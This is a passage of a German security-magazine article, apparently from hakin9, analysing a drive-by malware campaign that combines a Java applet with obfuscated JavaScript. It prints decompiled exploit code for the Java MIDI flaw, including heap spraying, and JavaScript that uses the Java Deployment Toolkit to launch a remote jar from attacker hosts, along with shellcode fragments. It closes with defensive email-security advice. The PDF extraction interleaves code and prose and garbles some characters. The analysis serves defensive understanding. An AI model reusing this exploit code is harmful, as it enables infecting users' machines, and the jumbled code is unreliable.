Magazin als PDF - Bites, Bytes and my 5 cents - portfolio

Weitere Magazine

Empfehlungen

Info

14 Listing 4b. Verifikation der als Parameter übergebenen URL „http://arestyute.com/sadhbdsa879321jbdas/l. php?deserialize=6e&i=1” Object localObject1; Object localObject2; Object localObject4; Object localObject5; String str20; String str21; String str22; if ((((java_version.indexOf("1.6.0_11") != -1) || (java_version.indexOf("1.6.0_12") != -1) || (java_version.indexOf("1.6.0_13") != -1) || (java_version.indexOf("1.6.0_14") != -1) || (java_version.indexOf("1.6.0_15") != -1) || (java_version.indexOf("1.6.0_16") != -1) ? 1 : 0) & (url.indexOf("i=1") == -1 ? 1 : 0)) != 0) { /** * Java midi vulnerable, see http:// vreugdenhilresearch.nl/2010/05/ java-midi-parse-vulnerabilities/ * for detailed explaination. The author claims, that it was �� in java 1.6.0_19 */ localObject1 = ""; localObject1 = repeat('/', 303); /* using windows ? no: return */ localObject2 = System.getProperty("os.name"). toLowerCase(); if (((String)localObject2).indexOf("win") >= 0) localObject1 = repeat('/', 302); else return; /* the core of the vulnerable: create a malicious url and ask java's midiplayer to play */ localObject1 = �� + (String)localObject1 + "Z%Z%Z%Z%Z%Z%"; try Zusätzlich wird noch das oben erwähnte verschleierte JavaScript auf der ursprünglichen HTML Seite geladen. Dieses ist noch erstaunlicher, denn es enthält gleich eine ganze Ladung von Exploits für Java, Adobe Flash sowie Adobes PDF Reader bereit. Der ‚Author‘ der Seite war auf höchste Kompatibilität aus, denn auch hier werden nur bestimmte – vor allem neuere – Versionen der Browser Plugins unterstützt (vgl. Listing 5.). Unter "http://www.exploit-db.com/exploits/12117/" findet man eine Beschreibung der Schwachstelle. Diese betrifft zusätzlich zum analysierten Applet die Java Version 1.6.0_19. FORTGESCHRITTENE { String str19 = url + "11"; localObject4 = ""; for (int k = 0; k < str19.length(); k++) { localObject4 = (String)localObject4 + Integer. toHexString(str19.charAt(k)); } while (((String)localObject4).length() % 8 != 0) { localObject4 = (String)localObject4 + "26"; /* 0x26 = '&' */ } localObject4 = str2 + (String)localObject4; this.mem = spray((String)localObject4, str10); localObject5 = new URL((String)localObject1); MidiSystem.getSequencer(); str21 = ""; MidiSystem.getSoundbank((URL)localObject5); /*
Malware-Doppelschlag per JavaScript und JavaApplet Listing 5. Codefragment des entschleierten JavaScript verdeutlicht das Potential: var fdata; var skd='%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00% ued83% ... %u6870%u0070'; var skd1=skd + '%u7468%u7074% ... %u0038%u9000'; var skd2=skd + '%u7468%u7074% ... %u0032%u9000'; function JAVASMB() { try { /* see http://www.exploit-db.com/exploits/12117/ for exploit description */ var u = 'HTTP: -J-jar -J\\bittoram.com\smb\old. avi http://arestyute.com/ sadhbdsa879321jbdas/l.php?i=2 none'; if (window.navigator.appName == 'Microsoft Internet Explorer') { try { var o = document.createElement('OBJECT'); o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA'; o.launch(u); } catch (e) { var o2 = document.createElement('OBJECT'); o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9- 00805F499D93'; o2.launch(u); } das Verbieten von JavaScript 3 , was moderne, Ajaxbasierte Internetseiten nahezu unbenutzbar macht, hätte auf das Laden des Java Applets keine Auswirkung. Wie kann man derartigen heterogenen Bedrohungen begegnen? Das häufigste Einfallstor für Schadsoftware bleibt die E-Mail. Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigste Schritt zur Sicherung des Systems. Moderne Anti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefährlichen Anhängen zu erken- �� http://de- .wikipedia.org/wiki/Java_Virtual_Machine �� fox. } else { var o = document.createElement('OBJECT'); var n = document.createElement('OBJECT'); o.type = 'application/npruntime-scriptableplugin;deploymenttoolkit'; n.type = 'application/java-deployment-toolkit'; document.body.appendChild(o); document.body.appendChild(n); try { o.launch(u); } catch (e) { n.launch(u); } } } catch (e) { IEPEERS(); } IEPEERS(); } ... JAVASMB(); nen, bevor entsprechende Signaturen bereitstehen. Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren geprüft werden wie der eingehende. Nur so kann man feststellen, ob man bereits ungewollt zum Spam- und Virenversender geworden ist. Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitslösung, da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert, sprich Bedrohungen meist schneller erkennt als der einzeln agierende Mail-Server-Administrator. Und letzen Endes gilt immer noch: Öffnen Sie keine E-Mails oder Anhänge von Unbekannten. MICHAEL PEICK Entwickler und Mitglied des eleven Research Teams hakin9.org/de 15
Seite 3 und 4: LIEBE HAKIN9 LESER, Das Hauptthema
Seite 5 und 6: 30 IT-Risikomanagement - Wozu brauc
Seite 7 und 8: Passwörter zu merken. Oftmals werd
Seite 9 und 10: Nun müssen wir noch unser Payload
Seite 11 und 12: Malware-Doppelschlag per JavaScript
Seite 13: Malware-Doppelschlag per JavaScript
Seite 18 und 19: 18 be dabei nicht an der Schlossfal
Seite 20 und 21: 20 Abbildung 5. Ein EVVA-MCS Schlü
Seite 22 und 23: 22 ter zu finden. Der Anfang der Ü
Seite 24 und 25: 12-11-2010 Die IT-Security Communit
Seite 26 und 27: 26 Web-Site www.cert.org betreibt,
Seite 28 und 29: 28 Abbildung 5. Mapping auf ISO 270
Seite 30 und 31: 30 ABWEHR IT-Risikomanagement - Woz
Seite 32 und 33: 32 ��
Seite 34 und 35: 34 Bewährt haben sich hier etwa dr
Seite 36 und 37: ��
Seite 38 und 39: 38 Für diese Attacke werden wir da
Seite 41 und 42: Interview mit Tobias Glemser „Sic
Seite 44 und 45: 44 INTERVIEW „Erfolgreiche Frauen
Seite 46 und 47: 46 SAP for DFPS Implementierung und
Seite 48 und 49: SEC Consult Recommended Companies M

Magazin als PDF - Bites, Bytes and my 5 cents - portfolio

Erfolgreiche ePaper selbst erstellen

Template löschen?

Als Template speichern?